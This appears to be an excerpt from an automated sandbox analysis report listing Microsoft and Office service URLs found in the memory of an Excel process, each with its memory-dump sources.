Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://pages.store.office.com/review/query
Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp String found in binary or memory: https://pages.store.office.com/review/queryTemplateStarthttps://
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspxAwsCgQueryhttps://
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspxZ
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspxu
Source: EXCEL.EXE, 00000001.00000003.622996638.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564819624.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599473071.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754138462.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292418003.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.741498759.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618708910.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.604793944.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620001254.000000000F47D000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonC
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13pW
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmp String found in binary or memory: https://powerlift-frontdesk.acompli.netPowerLiftGymBaseUrlhttps://powerlift.acompli.netSubstrateOffi
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://powerlift.acompli.net
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://powerlift.acompli.netU
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://roaming.edog.
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://settings.outlook.com
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://settings.outlook.comS
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmp String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workPowerBIGetDatasetsApihttps://api.pow
Source: EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmp String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workhttps://login.windows.net/common/oau
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://staging.cortana.ai
Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmp String found in binary or memory: https://staging.cortana.aiBearer
Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmp String found in binary or memory: https://staging.cortana.aihttps://login.windows.net/common/oauth2/authorize
Source: EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://storage.live.com/clientlogs/uploadlocationicc
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.com
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWrite
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistoryMBI_SSL
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistoryuR
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.com/search/api/v2/initMBI_SSL
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.com/search/api/v2/initZh
Source: EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.comP
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.coma
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.comcB
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.comj)
